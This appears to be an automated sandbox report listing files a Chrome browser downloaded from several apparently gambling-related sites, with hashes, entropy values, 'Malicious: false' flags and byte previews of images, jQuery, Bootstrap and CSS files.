                                          Preview:GIF89au.&.....2/...Y`...vt)2.......!.......,....u.&....x...0. J.0...`.UV!L...l..P....V..|.....4...H..(...........t{....,w.|..B.Z.a.K.7|M.Ph..%....n8FN&:@F..|V1~w.y....r.. .9.khlO.j.!.s.\...m..&.\...AZ.PQ..~...yX..R.............WE.z85.'...............D.a...........,...L......&..P..<.T..H...g.t..gj..4.. ....O1..>*HF%.$...i2@..L...\.N.$..(.'&3g..9(.r...9..D.,i.q+l.;)4. 0.06`Z.fW."U.M...Ni..jC...X..x..m.............eK..........n..BC[.. `........_.:&.`.S........../m..Y..... .a....~.....0.....p.!..i..6..f...y\<..{.f.[t..O'.S.A... .\L......`.....m.T52.D]P..U.a.}..H.=..~.Ux.m.d....e..Z$..#.r0!~.*..W+...v.#.U.a..mf=..*L...<0.3..]..x...\y..2....).J.h..iH.t.....HK&......D.K.....;
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):6379
                                          Entropy (8bit):7.945124258614392
                                          Encrypted:false
                                          SSDEEP:192:JYpCfXM/cHur2CY9hFx/40ynVl2WGw3/X:JVMd2Csl400UCX
                                          MD5:6498A9D97304B0B805C98ABBDA8ED0FC
                                          SHA1:EBBC775BAFBCB958B3E4111A08AA30A8EE04500C
                                          SHA-256:07BF983F17C6B63C74E12BC837F87A19F4656B6D901F91AFF0646A0AD1390245
                                          SHA-512:497FFEA39EB48825137988609B8204258C8F41362368D7574217C664D77596EAAE0DDF8BC0B9400EC90E7CDCA368ACBA65CE311883A10196BDD983A37342A228
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/kaiyun.png
                                          Preview:.PNG........IHDR..............2.....|PLTE....%N.%N.%N.%N.%N.%N.%N.%N.%N.%N1...%N.%N-...%N.%N.%N.%N'..0...%N.%N5.....K..8..&..-..5..D..p..@..1.."...%N$...%NO...%N...`...%NF..0..*..!i.*..)..$w. ^.$...%N6..j..e..5..9.. a.J.. ..1..:..*..f..*..#k.6.."..E..!e.=..!..`../..#..1..N..`.. f."..^..Y..+.. d. _....+.. `."i. ..6..$o.>..6.."j.:..J..7..N..&..1......%N7.....l..*..8.....6..!c....&y.3..)}.E.. ].%..C..7..@..+...%N ...]....!b.-..............4.....;.. ..;..*.....e..=..9..'..#o.5..,..)..4.....6.."..+..&.....'v.O.....F..V..)}.J..>../........B..,..7..(..*..8..... ..9.."j.8..5..!g.)..3..$..2..$..%..\..A..,../..2..#..0.....:..7..:..*.....;..4..5..=..!..)..;.. }."...v.?..O..G..B....`-...{tRNS..?...#.....\i9.....Iu.b"*'.S...y.h.f.CD63...OG2.U..J......|nd..}S...n..T$.......@.....`............o...........u....IDATx...1.. ....8`.@. .....wMR..........I.W.......8..=....!......U.....P.`u..N.9...f...?..D.k....'.\.'......Y......$.Vo0.v..t`.._.i.........s.6y.vC'...-\!..~}G.....p.Z'
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 692 x 520, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1442284
                                          Entropy (8bit):3.519017284151463
                                          Encrypted:false
                                          SSDEEP:6144:Twa8IgDoEyNun/MtW3ioFzdHb19NIpmw1uvMP3KhuTvx2RO6zRAP:0arOGNu/Mt/+3NIpmw1HP3Y8vKeP
                                          MD5:247D44F14A7A9A01E0D52B998F0FADA0
                                          SHA1:35CE6E6E9097BEB634291282AC4626DD4507C5B2
                                          SHA-256:BDC713F840C5CE0CAB78B157B2C33F1FFF50825B5FDC6F76447BCF1FEB6B794B
                                          SHA-512:1B1C487BD0124857716A640AA98BA0406C73E251B0FE8B2DF8AA4B98BA9868F010BBAD8BE55F253492909CF0A55EBB3CD206332EC00CFFCB80D46903BD3CE898
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............6}.....pHYs...t...t..f.x.. .IDATx...3~...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):7076
                                          Entropy (8bit):7.950564894223784
                                          Encrypted:false
                                          SSDEEP:192:8u2vJzscWVb7BpUg+OPXr8aeSUDAcBWalDIytYuvpLEmLAgKUR2Af:32vhdWbpHLP78bNoalbaIEmLAgKhAf
                                          MD5:F54529F769913035E9BC66A8B12628A4
                                          SHA1:307730FFE890FB6CCB68E0B4B3A1035CF06B5B2D
                                          SHA-256:EEE83710DE65BDE638DB3085F8A1418FE482523F500AC67AB4029D7D34E2F480
                                          SHA-512:BD386A341E7EA0E1992F51AE25445DA862C12AACCD6712C8289CEC99E81924D2194B6C3BD85E1ECF973094A9178713E15580613A0983E8472149955FFF45CA85
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2......PLTE.....x.rc..t.pa.`O_=.yR?.n`.[KI$.e;$..u...]/.tJ3.td.gX..q...D..g9.uTG['._3.N).]2..fU.iU.U@zRBY6.oF.lF3.qa.[K`5.yP:.k[yWFZ0.g@1]1.zTCY4.^).pA.b6#|XE.}mh@.f<$kB,.`Q....mZ|]O<..\*.zU@_9$.Q;:...gWrF2.}lfA1c4.c7.Q#.c6 .]G.hY<...lUgPFk9.W,.a2.c3.wN5k5.rI5oJ=Q%.Z..j@&P).h;)iA0c;"~W@o?$rC*hB0^2"\3"a...zigC4.whZ".Q..W+.A..Z+.Y$.M..P..T..z^R.[F.\H.]Cb5$P..I..N..R$._2.Z-.|`RN&.mD,mI0o>%.`HJ..a..wZHhC0nO;qB/eD3=....v...`7"8..b,.W%.h= uG-Q..n:.^*.nOB...=..pD..kUB..7....G..-..{P=.wa..Y$.=...vaL).|R=..y.}i0..Y(.[&.V'.^(.U..R..O..M..Y&.V!.[+.U).N..S#.N..I..K..T..W+.Y&.K..G..C..X#.I..G..[,.Q..Z#.l;$Y*.G..Y..C..:..?..W).S#.W"._..]".d..\%.Q".....bS......%.r....tRNS.......o 3..%...WP....D...F.ba.~<<..~+#......RD:.]:,)"....wgSN.....tt]X......K...........xjf`5..........xgU......yp.........o^]KF4......wN...iU...r&......|..pp....'IDATx.....A.E.!A..$$..X...(...N.x,.`>3l..3.u.-i.y.t...5..................=...4m....$=.>7GS4....L.tS...y{(..)..+v.)..=..&..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (59765)
                                          Category:dropped
                                          Size (bytes):60003
                                          Entropy (8bit):5.144554391978608
                                          Encrypted:false
                                          SSDEEP:768:wfAnnayQIk8HVheIE8Dg76TXQI4vPKMEK6viTlCDFm4n6xOp6Pxg3/wCVaAk1:wfUnTcWCw6xJxg7aAu
                                          MD5:77CBAD27852866CEC1E32648EAAFD22D
                                          SHA1:3EE3E67EDDF2A6A59A46EF6644F93BA97EFEEFD1
                                          SHA-256:2CED6F997D7FCE10A38DDC75C2F24C9F8945F44E746128F3DCD61D923EA3FDCE
                                          SHA-512:A21CF01B710E11583B03EE215163E45B0531FE30D6EB641310B8DEA5AE23360ACD6F5F27AD9404258ED190701C418F4F85386C640372CB38CD0061F10DF48F7B
                                          Malicious:false
                                          Reputation:low
                                          Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function s(){return(s=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&Objec
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 100 x 22, 8-bit/color RGBA, interlaced
                                          Category:downloaded
                                          Size (bytes):3294
                                          Entropy (8bit):7.925369044227741
                                          Encrypted:false
                                          SSDEEP:96:Hej86oIAG5+8aOMrzoqrLKsQ49EgTZPeWm:HPNGbaOUcqrfS+eZ
                                          MD5:E7C1F199EF4AD1CD5E2381777F3AF90F
                                          SHA1:8B06F308405EEC3219587E4DC9E67BC6280FA841
                                          SHA-256:A01D73B630804F843C99D70F8F64A30303A8BC1273FED46BDF9F3D190BEA8A68
                                          SHA-512:4A790EE2F5FDAB27981B429A89694055AA5BC8EC873959117E73F71A6DBDE745E143B2738AE04C7960FC2B1B382D52CC1E7792EFDE67072619BD58E6439D5363
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p.ssl.qhimg.com/t010e288a56a0b005e9.png
                                          Preview:.PNG........IHDR...d.........A.......gAMA......a.....IDATh..yt.......$... D.....R.M..F...b..X.l...ZA..,j(j+n.X.,.{.F.%.`.#i.D....P..IB...d~.|_...q.........w.....{.7.CI/...`..U(XX.oI)77wSNN.'~AAA.......<.......;Z<//.$.R..0....X....o.P.Q.z..X.8b.Q4_...B.+VO.d..U...?...^^^....W....>.};.y..wj....'..u.u..\..;..<.KB.~..6.^...gK..O..V..C>.....?....[%D....#...!..*(....7X8.c.#%...`p$....o.c...l....f.$;.W....^.|.;.|@.....N........q.3.~;._.v......p}..^.{N"5..1...j.....g...LJJ....x...Y..eee.%..&..2.b.A;.:]r.$.1uF.me0hb..B.....N{.p.v....F.c5.Z..{.....cS....."..C..9..MD..h.p...#F$.g&I.Q.v;lC3eoV..'.~...?e):H....).)[1.u.....mDDf)@{.l@...Wj..=o.a..~.{ .d.r.s.'...w...:..s..W[..Vi.>._U8kq.p.....g...1n..[.....S......."..Y<.8b.y.......@(.....RP__....+.f.t.....X<#..-.z.o..Z>gT..'!rM..d..zj.vla............D..@.....F.h..|....I....I%%%.222*v...G...&.N..K.~..d...K4...$...O.V<5.v.Dp%..S...9.Xe.f..d..Zd..tPK.}.(m.x..e;.%...X.;.i.........u..:..L.E.i...2.<...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):5313
                                          Entropy (8bit):7.933189242085673
                                          Encrypted:false
                                          SSDEEP:96:VB8d47I7O6++59andvI7N2ntL2DvvSq8cWLaQMTC6ANQMIgrkfieWpfmby:V4t7O6x/+pns783L8ANQHxWwby
                                          MD5:759534A3C80E7AD77DEEE14DA3D94CD8
                                          SHA1:12D6FB2D8E7D74D3235E095D3C3C667E539702DE
                                          SHA-256:121DAD2A5CA7AFFDA231FC459B5ECA6E6141E5D58061681D76679436E1DC5FC3
                                          SHA-512:25B27948DE8FBF5C087D82C9571769B6ABF2D8B05DEE7688F33959D659B010D58F032D59666543E5EAC82F26FB00A170E9F5525BFE5BD9768675CFA399BDB908
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/wlxe.png
                                          Preview:.PNG........IHDR..............2.....UPLTE.....*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*...........(.....!........,..o....$..'.....+.................3......../..UON...k......#!3...........?B[>AZ..(...JDH..........q..5../2M0-;...kZSQ)'7......}..mpf[..,..%..e\VB>F<8B%%8........{_WT..,...p..h...................w.xezo`FAH.........z.|h~sdbZV20?-+:...........ulcZi`Y63=..'........|OIH........vvmbri_NHM......................v..n{paQKM.."............vl[*)=........r.ub75B.....s`WO*-I$'C.........y.........mA=A..........{i.....WXkILd................jl.g]I..._bv1.B.....tRNS...[.....1.....|.....y6.....IDATx...[n.0.D..#...@.....T.D..g.....c<.).e].e-}L...Ie{_?.......c..7a..R.....!RB<.........2N..i?S......U..D1......^W...rF....p...7......?:.2.....4.>..........._.2..G_8R..r..ZAU.n:............................?....... ..A:.D.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E._..I.a......$..G..z...D...Q."..DJ.5V.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (32769), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):94792
                                          Entropy (8bit):5.372834716258878
                                          Encrypted:false
                                          SSDEEP:1536:tYRKUfAjtledRTmtaFyQHGvCXseUOgRc9izzr4yff8teLvHHEjam7WuX3yzSiLnM:0UbYGvCD0932o2skAieW
                                          MD5:98A1899FF7D9D8DAF67A72AF10589D55
                                          SHA1:B4B807EE37CD8A33A501EF42E5872903DD93F3EB
                                          SHA-256:0FB548049AD8AD7580D2D60CA24FB2FA3BAD3303565CD826F92D44EFBFE9CAC3
                                          SHA-512:E11465F8D6699F82355DEF73E8359BFBCD8226449CE276658474DCA0956C896319AE7554D1BDD40FD41F099CD7EF2D05621C173D0252A9B51944F37C19BF5696
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/js/jquery.js
                                          Preview:..(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 72105
                                          Category:dropped
                                          Size (bytes):17861
                                          Entropy (8bit):7.987401439888671
                                          Encrypted:false
                                          SSDEEP:384:U/Q5U0yn7Mm3p9xEC1eQDAOZgnAoT0/Zdrb8knde4EHgtyrxfkb+:UYb07Mm3p9V15WAoT0/Zdrb8knQ4DyrP
                                          MD5:D86AEF4B07AF18D77E8F9966F285AD30
                                          SHA1:7DDE81A54FCE17231F43CDF55FE8E9A87C12EC4F
                                          SHA-256:EA6330A775014717DDFB3069F62E606129648324C0F725119BAC4DFD5B5609C7
                                          SHA-512:51C89A1304C7533C6D8B548660BF239A75BB1987D509A6914998CB965EE60A115A41041F733E79B09A88B95AE11EC93E67572243B5C4319ADD4EA1435D9C2127
                                          Malicious:false
                                          Reputation:low
                                          Preview:.............[.u..W...y.....rI-.K..Y~(.......S......2.f....,)..8._^9.l.9r..b..U..I.*...........{.b.+.....O.s......_.K....`2...'..at.=.Of....t.L.....l..q.L..O.....D.&..ar.b...p0NzA..UE&.JaC......!...Q..%...g.:.....[...A...g.tgk.....p..=x.Tqk...0..t...}..gc...N.....p.ugG.b..5.4...K.....\b.6....l.=-....N.1..:.M...Nu>....*r.d....~..t...Vw.d.R.......%.8..+..dvb.....1.z...n'.4.'.. .5.7!.:L.G.~.\.`....8...H.;..0\JF!.p.w..'.g.H$./...Kf.S.;..N..y2.1....u..X...d%...9.B..}..\f..%.....}..'..;<N..2...@.T.&....$.w<?....wv.p}D..Qw..'P.$J!..S......V.D..q.V!..%)hj......,....v.L.8KF..i.;L..x|.&...d.6..9......dv8..4*..A..=L....E...Y.. .A.=....ji..K.V.......=E.N.ki.p....Q%..{..8F......U.A(.)%..7H.1~...P.Q...Q..E.B.4H.u.!.^.0w.......D[U.Y[_.. ....".@-.,..QC3.lrA.&Y.4.*cNUB.PS..:H{....G.'.H....%hI%'mVg.k.X..G....LC,..^.:.....9....|tVP1....%. .z.....j.g.c......d|88*.'..l2..."......q..QX...;Bw..1z.C.....c/+E.C?.....a.}.C...0......F.Q.?..H..k.|.SP!.8!"..r...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 61020
                                          Category:dropped
                                          Size (bytes):15779
                                          Entropy (8bit):7.985132186137957
                                          Encrypted:false
                                          SSDEEP:384:HUMeMD7CKDqG9SmepDPqHAZrP0IIdU6QCz+O8kIfHfq37s1:ueuISm6DiHANPIK6R+ffq37s1
                                          MD5:A82B3B82DA26DF061D5D7D0AB1607C7C
                                          SHA1:2E6D933FE312254EBF4E07D0BDCFF97E9A0CF0AC
                                          SHA-256:0796E96C23716CC6ECB811E5066B2E69854E5E5DD36AF768529DC42234302506
                                          SHA-512:32AB769CA0C66870353B47E126BFE85E258CCF75A36DB411AC32DDCE7D2684953B9F0AA867DAE16FC9DAAFD1BE4533C1E298FA0A30F6D9D9B04C278C88EAEC5C
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........}....q..._1;Z..,.X.4e...}.hK"ER.......,..b `.%..{JbG.-..a.qr....."9...9.}......../\UWwO.L..KJy.`.;...U.U....c..-...o......KW..Ym...r...g.>x..w.z.........I...F.^k`.i..M.f.....r)HBk?.F.(.Zg.W._..}....X.5_..N.............jJ.:..`..p2....n......Q.r....w..n. .&}...g.uY..P.....P..n....'.q....=.m.J....n........Y....X.Xm.6.!......@...p.../;.........r-.o..M...$j.B.r....pO@.77..$....Q...b.X.A<.m..$.....7..7....h..?....../?z.....W.......6....'......>.....w....'..W.../.}...;o..........{.:..g.?......|..............Y......F`..a...%......Am/...a..h......o....._k.....q2.....id..U^xsc.s7....:...m....l.mMxc....{.....UdC...?...W(5..4D...=].u..6...p<..jxo4...X6.p$...M.O?}......@Xm...........;..].U.:.x....r.h........m.JP.D.Go.P.......?..O.~.. |..i.VC...#..tls....(.vo..*Z.H......A......(...D..z.l.Qk...m'p..ZoX.`q_&...q.L.C+.u.^0.$...U.i.T..{...4mD...i._....K.....h?l...=&/..,.&.ho.'4..=.....kBv.l..A..A.Q'H....D...D.L....#...t0..4..x:...A..w1.7........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text
                                          Category:downloaded
                                          Size (bytes):1862
                                          Entropy (8bit):5.794140484746066
                                          Encrypted:false
                                          SSDEEP:48:xdmdpexyWEHdTc8mEAj+FIFh6EQ6Jl66J1jdOGO7wcDUNu:Dmdpecyn+tqOabpSwu
                                          MD5:FA91B86293C33848631CD835A31ACE19
                                          SHA1:CB09293E76FA97E8B0FDF4639B9B091689A962E0
                                          SHA-256:8A4942489EA9D6E193B1BAA3B3B84D0FCC46C99CF2F07E611698CF9BFC501365
                                          SHA-512:22F2B18D33229D3E9845031C41219B29B776C6C02F7A71A04E3DE95B557F9581B893088867EB66D1EB7A899B1F688E9566C9BAAD7709757DE5F0FBE602218222
                                          Malicious:false
                                          Reputation:low
                                          URL:https://551000l.cc/images/favicon.png
                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">.</head>.<body>.</body>.<script src="/__error_/static/jquery-3.6.0.min.js"></script>.<script src="/__error_/static/_errorPageModule.js"></script>.<script>.. new ErrorPageModule({. classList: 'black',. TypeError: '404',. TypeSite: 'default',. siteLogo: 'htchess_01',. TypeInfo_CN: ".....",. TypeInfo_EN: "Not Found",. ip: '...............',. cn: "........................",. us: "Sorry, the page you are searching for does not exist",. jp: "................",. ko: "...... .... .... ....",. vi: "Xin l.i, trang b.n .ang t.m ki.m kh.ng t.n t.i",. in: ".... ....! .... ...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (669), with no line terminators
                                          Category:dropped
                                          Size (bytes):687
                                          Entropy (8bit):5.217403162786378
                                          Encrypted:false
                                          SSDEEP:12:1cuHAPIJAuIrVgl17rTAoIr9/7KVDI0RE+VgiF8+9Mn3IztQLPoIQBXjMnWIEnxJ:1cCAPIOuIxgPkoIhTK5ZG+VLF8+9O3IR
                                          MD5:9EFC0DBB4505675569C5718E1977FE85
                                          SHA1:3EFB0631C80E9B9B79153FC27BC7954F54E2A2C3
                                          SHA-256:667589AACE8EDB644B6338298D68D9461AEEFA5864E18270C489BCB4CE7C6D44
                                          SHA-512:E63A813F0055E0BE3C99C2F6F87E05E96077BF9939FDD26F8D50806409A446EC48021C521C5B3341A23AFE0B5ABDFB2CC4909EE7890D641F0BDB195EF2FD66BC
                                          Malicious:false
                                          Reputation:low
                                          Preview:define([],function(){return Class.extend({init:function(){this.getTemplateHeader()},buildEvent:function(){var _this=this;$(window).resize(function(){_this.resizeHeight()})},getTemplateHeader:function(){var _that=this;$.ajax({url:"/commonPage/error.html",dataType:"html",type:"POST",success:function(data){$("._top").html($(data).find("div._topOri"));$("._footer").html($(data).find("div._footerOri"))},complete:function(){_that.resizeHeight()},error:function(){console.log(".........")}})},resizeHeight:function(){var resizeObj=$("._center");var topObj=$("._top");var footerObj=$("._footer");resizeObj.height($(window).height()-topObj.height()-footerObj.height())}})});
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 3209 x 1811, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):23285492
                                          Entropy (8bit):2.4149941006951083
                                          Encrypted:false
                                          SSDEEP:393216:LS3jvHpgHeYLbQVB5U3Rg6WEYiopb8vB/wZAr7MaN/nX2m/5OtM/U3l5YwaIieql:LSzvHpgHeYLbQVB5U3Rg6WEYiopb8vBN
                                          MD5:F3AFAD3291F0B28550FCE05C6FD5AA87
                                          SHA1:4403FFE6B131490B9617A049B85464D77986193A
                                          SHA-256:9C8B81FF0645F931C72506B4650E2C80C17C2B0D6D2B848A6439DEF477513B9E
                                          SHA-512:04E85217D097284720CF43D23F2BA9E2982B251E6595365A5BA123A4B213FFD632A88B40368C9B9F6BF89F1249E02D649EB9A682E014098B70962AB6CF2ECBAE
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/__local/F/3A/FA/D3291F0B28550FCE05C6FD5AA87_291DC08D_1634EF4.png
                                          Preview:.PNG........IHDR.............kd......pHYs...t...t..f.x.. .IDATx..o..i.,"#...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 72105
                                          Category:downloaded
                                          Size (bytes):17861
                                          Entropy (8bit):7.987401439888671
                                          Encrypted:false
                                          SSDEEP:384:U/Q5U0yn7Mm3p9xEC1eQDAOZgnAoT0/Zdrb8knde4EHgtyrxfkb+:UYb07Mm3p9V15WAoT0/Zdrb8knQ4DyrP
                                          MD5:D86AEF4B07AF18D77E8F9966F285AD30
                                          SHA1:7DDE81A54FCE17231F43CDF55FE8E9A87C12EC4F
                                          SHA-256:EA6330A775014717DDFB3069F62E606129648324C0F725119BAC4DFD5B5609C7
                                          SHA-512:51C89A1304C7533C6D8B548660BF239A75BB1987D509A6914998CB965EE60A115A41041F733E79B09A88B95AE11EC93E67572243B5C4319ADD4EA1435D9C2127
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/bootstrap-daterangepicker/moment.js?v=1736150851437
                                          Preview:.............[.u..W...y.....rI-.K..Y~(.......S......2.f....,)..8._^9.l.9r..b..U..I.*...........{.b.+.....O.s......_.K....`2...'..at.=.Of....t.L.....l..q.L..O.....D.&..ar.b...p0NzA..UE&.JaC......!...Q..%...g.:.....[...A...g.tgk.....p..=x.Tqk...0..t...}..gc...N.....p.ugG.b..5.4...K.....\b.6....l.=-....N.1..:.M...Nu>....*r.d....~..t...Vw.d.R.......%.8..+..dvb.....1.z...n'.4.'.. .5.7!.:L.G.~.\.`....8...H.;..0\JF!.p.w..'.g.H$./...Kf.S.;..N..y2.1....u..X...d%...9.B..}..\f..%.....}..'..;<N..2...@.T.&....$.w<?....wv.p}D..Qw..'P.$J!..S......V.D..q.V!..%)hj......,....v.L.8KF..i.;L..x|.&...d.6..9......dv8..4*..A..=L....E...Y.. .A.=....ji..K.V.......=E.N.ki.p....Q%..{..8F......U.A(.)%..7H.1~...P.Q...Q..E.B.4H.u.!.^.0w.......D[U.Y[_.. ....".@-.,..QC3.lrA.&Y.4.*cNUB.PS..:H{....G.'.H....%hI%'mVg.k.X..G....LC,..^.:.....9....|tVP1....%. .z.....j.g.c......d|88*.'..l2..."......q..QX...;Bw..1z.C.....c/+E.C?.....a.}.C...0......F.Q.?..H..k.|.SP!.8!"..r...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:downloaded
                                          Size (bytes):2909
                                          Entropy (8bit):5.3160626527929455
                                          Encrypted:false
                                          SSDEEP:48:FX3xZUflWCw6KEAyDe5saRrF5N55ph5vlO58l5Crc4/5T5AinDAG:FnepG5zNDpbtE832Tf
                                          MD5:1DA71520B7A0A61526A8FA8D0FEB40D1
                                          SHA1:BA1BF69DAD8783563328054CAE58CCABF1B00829
                                          SHA-256:5EB4D895BCB33061CDA238C8FF4985EDE69A866819B980C732CF3802EC101E8D
                                          SHA-512:D1CB92160523C231C4942F27C018BD3B30F89FC60153E23EB0A49D0696C896B0904EBE5DB7CB97A0686F656D04A58F3CCF8FC0F09F2BE703FA8400BD3270DFA8
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/themes/hb/css/pc.css
                                          Preview:#container{width:492px;height:602px;position: absolute;top: 50%;left: 50%; overflow: hidden;margin-left: -246px;margin-top: -301px;display: block;}..inputClass{font-size: 16px;position: absolute;outline: none;background: rgba(0,0,0,0);border: none;text-align: left;}./*.divClass{width: 100%;height: 100%;position: absolute;top: 0;left: 0;display: none;}*/..ab{position: absolute}..btnFont{font-size: 0;cursor: pointer}..divBg{background-color: rgba(0,0,0,0);z-index: 1111;background-repeat: no-repeat;background-size: auto 100%;background-position: center}./*#containerOut{width:100%;height:100%;position: absolute;background-color: rgba(0,0,0,.7);top: 0;left: 0;z-index: 1111;}*/.#lotteryPage{background-image: url(../images/lottery_pc.png);display: block;}.#lotteryPageBtn_0{width: 49px;height: 49px;top: 48px;left: 365px;}.#lotteryPageBtn_1{width: 136px;height: 137px;top: 209px;left: 184px;}.#lotteryPageBtn_2{width: 144px;height: 59px;top: 405px;left: 184px;}.#noAwardPageBtn_0,#haveAwardPageBtn
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):95
                                          Entropy (8bit):4.60108909804675
                                          Encrypted:false
                                          SSDEEP:3:UIyPXEFuTII7VmDDxeWF4NDRVfpWWhXt6iMA:UmuEKieWSNDRXWXi9
                                          MD5:CB16B8B2FAE1A2CB3DDBA43817FDC763
                                          SHA1:C1BB1153A3EBB528F86FA5CC57DDD4BFBE9BD4AF
                                          SHA-256:66897F9CF68B725ABD635D7DC7C1F4E91C80A41779C91BD25CF3A504D8F07407
                                          SHA-512:0DABBE50FF2EA388864E9ACB9F406EDA80358C3EAD6B12FF3C64F0D5CF4A3EDF434426FC5872EA044C7503FBE04F21B6BB9F957E2ACDAD4FA0304804519ED712
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/sitegray/sitegray.js
                                          Preview:/*.. * -- grayscale.js --.. * Copyright (C) James Padolsey (http://james.padolsey.com).. *.. */
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 26 x 24, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):672
                                          Entropy (8bit):7.334837721842012
                                          Encrypted:false
                                          SSDEEP:12:6v/7vhCU7dy3dk5EozW3QAkBJkbMcCqo1p7uQnv39Pa1e9Ww8e:E4NEY3QAsJRZ1HRvNS9e
                                          MD5:983BB817372F31C6BE9003B758D97013
                                          SHA1:66B0C8043D7FB6D5542662D93241F3A57BAF29E2
                                          SHA-256:F1A12BBFBF41185DEB0472DDF0830D879F709DD1937F764605A94ADDDF16F7D4
                                          SHA-512:8E761BC4FEA8488063369FE3A6B087EFA6C9FBDF8BDE8D3912FD0E9B7C25E4E301D95F1AE483A433C7C10C1191E6B4CACCE39DDCC737B41DE45DA36DF5B89E16
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/ico_tz.png
